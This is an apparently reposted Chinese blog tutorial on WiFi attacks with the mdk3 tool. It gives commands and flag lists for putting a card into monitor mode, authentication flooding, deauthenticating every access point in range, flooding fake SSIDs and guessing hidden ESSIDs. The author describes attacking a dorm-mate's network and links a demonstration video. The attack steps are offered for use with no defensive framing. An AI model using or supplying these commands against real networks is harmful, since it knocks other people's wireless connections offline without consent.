分享

损人不利己 — MDK3 WiFi攻击

 无云飞 2015-12-29
  • 激活网卡为监听模式
    airmon-ng start wlan0
  • 扫描附近的无线信号
    airodump-ng mon0

方法一:身份验证攻击

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应

  • mdk3 mon0 a

         -a<ap_mac> #测试指定BSSID

         -m#使用有效数据库中的客户端mac地址

         -c#对应 -a ,不检查是否测试成功

         -i<ap_mac> #对指定BSSID进行智能攻击

         -s<pps> #速率,默认50
  • mdk3 网卡 攻击模式 目标
    mdk3 mon0 a -a MAC

2

 

以下是攻击宿友电脑创建的无线,效果如下。

22

222

 

方法二:伪造断开连接

在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!

  • mdk3 mon0 d

         -w<filename>            #白名单mac地址列表文件

         -b<filename>             #黑名单mac地址列表文件

         -s<pps>                       #速率,这个模式下默认无限制

         -c[chan,chan,chan,...]                 #信道,可以多填,如 2,4,5,1
  • mdk3 mon0 d -c 11

4以下是方法二测试视频:

http://my.tv.sohu.com/us/235484955/76316147.shtml

 方法三:伪造AP

产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋

  • mdk3 mon0 b
  •      -n<ssid>       #自定义ESSID

         -f<filename>           #读取ESSID列表文件

         -v<filename>          #自定义ESSID和BSSID对应列表文件

         -d      #自定义为Ad-Hoc模式

         -w        #自定义为wep模式

        -g       #54Mbit模式

        -t  # WPA TKIP encryption

        -a#WPA AES encryption

         -m#读取数据库的mac地址

         -c<chan> #自定义信道

         -s<pps> #发包速率
  • mdk3 --help b #查看详细内容

1 w1 w2 w3

 

方法四:探测AP信息和ESSID猜解模式

  • mdk3 mon0 p

         -e<ssid>         #待检测的ssid

         -f<filename>         #检测AP设置为隐藏的ssid列表文件

         -t<bssid>              #用bssid检测AP的信息

         -s<pps>               #速率,默认300

         -b<characterset>             #设置字符集

 




转载请注明出处(http://www./1993.html)
来源网站:几许博客

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多